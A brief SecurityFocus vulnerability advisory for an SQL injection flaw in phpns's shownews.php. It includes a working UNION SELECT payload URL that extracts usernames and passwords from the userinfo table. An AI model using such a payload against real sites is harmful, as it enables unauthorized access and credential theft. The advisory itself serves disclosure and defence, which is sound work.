phpns Shownews.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs available:
http://www.example.com/phpns/shownews.php?id=1'[SQL Injection]
http://www.example.com/phpns/shownews.php?id=1' union select all null,null,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),null,null,null
from userinfo/*


 

Privacy Statement
Copyright 2010, SecurityFocus